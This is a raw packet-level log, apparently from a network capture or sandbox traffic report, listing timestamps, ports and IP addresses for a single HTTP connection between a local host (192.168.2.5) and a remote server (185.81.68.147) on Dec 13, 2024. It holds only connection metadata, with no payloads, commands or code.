Dec 13, 2024 01:37:09.179862976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.180670023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.180772066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.180872917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.181524038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.181586981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.181642056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.182476044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.182562113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.182666063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.183377981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.183520079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.183621883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.184272051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.184333086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.184468031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.185200930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.185332060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.185430050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.186108112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.186180115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.186199903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.187011957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.187135935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.187235117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.187947989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.188010931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.188052893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.188832998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.188961029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.189055920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.189749956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.189812899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.189857960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.190680981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.190793037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.190891981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.191572905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.191632032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.191683054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.192481995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.192542076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.192643881 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.193372011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.193432093 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.193594933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.194305897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.194447041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.194576025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.195194960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.195266008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.195311069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.196105003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.196202040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.196324110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.349786043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349814892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349831104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349838018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349845886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349853039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349859953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349874020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349881887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349889040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349896908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349905014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349920034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349926949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349941015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349955082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349971056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.349987030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.350002050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.350016117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.350037098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.350105047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.365668058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365698099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365725040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365762949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365778923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365792990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365808010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365823030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365838051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365848064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.365853071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365869999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365884066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365899086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365901947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.365915060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365922928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.365932941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365956068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365962982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.365972042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.365988970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366004944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366007090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366019964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366027117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366038084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366053104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366070986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366071939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366087914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366097927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366103888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366118908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366134882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366143942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366151094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366168022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366174936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366184950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366193056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366203070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366218090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366220951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366234064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366250038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366266012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366272926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366293907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366627932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366646051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366661072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.366739035 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.366761923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.367160082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.367327929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.367433071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.368088961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.368253946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.368366957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.368988037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.369107962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.369546890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.369865894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.369991064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.370090008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.370805979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.370925903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.371436119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.371705055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.371795893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.372677088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.372761965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.372783899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.372826099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.373543978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.373661995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.374428034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.374456882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.374536037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.374572039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.375359058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.375446081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.375564098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.376262903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.376341105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.377145052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.377250910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.377266884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.377311945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.378078938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.378156900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.379004002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.379117012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.379137039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.379182100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.379903078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.380004883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.380827904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.380930901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.380934954 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.380975962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.381710052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.381817102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.382621050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.382714033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.382730007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.382766008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.383537054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.383641958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.383778095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.384443045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.384563923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.384666920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.385351896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.385473013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.386279106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.386306047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.386428118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.386449099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.387170076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.387280941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.387386084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.388129950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.388175011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.388940096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.389024019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.533158064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.533278942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.533572912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.533657074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.533670902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.533710957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.534426928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.534554005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.534637928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.535356998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.535454035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.535537958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.536226988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.536354065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.536443949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.537153959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.537264109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.538072109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.538182020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.538193941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.538220882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.538947105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.539056063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.539879084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.539967060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.540725946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.540833950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.540848970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.540945053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.540956974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.541661978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.541820049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.541929960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.542587042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.542714119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.543510914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.543595076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.543689966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.543788910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.544425964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.544542074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.544651985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.545341969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.545448065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.546238899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.546324968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.546396971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.546502113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.547139883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.547250032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.547617912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.548052073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.548173904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.548996925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.549103022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.549105883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.549143076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.549897909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.550000906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.550826073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.550908089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.550921917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.550965071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.551708937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.551810026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.551954985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.552599907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.552709103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.553534985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.553621054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.553630114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.553668976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.554421902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.554543018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.555401087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.555489063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.555521011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.555624962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.556337118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.556447983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.556760073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.557173014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.557296991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.558056116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.558135986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.558171988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.558273077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.558995962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.559135914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.559237003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.559889078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.560002089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.560826063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.560905933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.560914993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.560950994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.561691999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.561825991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.562596083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.562680006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.562731028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.562834024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.563519955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.563648939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.563750982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.564440966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.564567089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.565346003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.565427065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.565480947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.565584898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.566229105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.566360950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.567080975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.567181110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.567260981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.568149090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.568239927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.568281889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.568322897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.569010019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.569185019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.569894075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.569983006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.570105076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.570208073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.570833921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.571044922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.571705103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.571785927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.571863890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.571964979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.572608948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.572740078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.572843075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.573543072 CET	80	49707	185.81.68.147	192.168.2.5
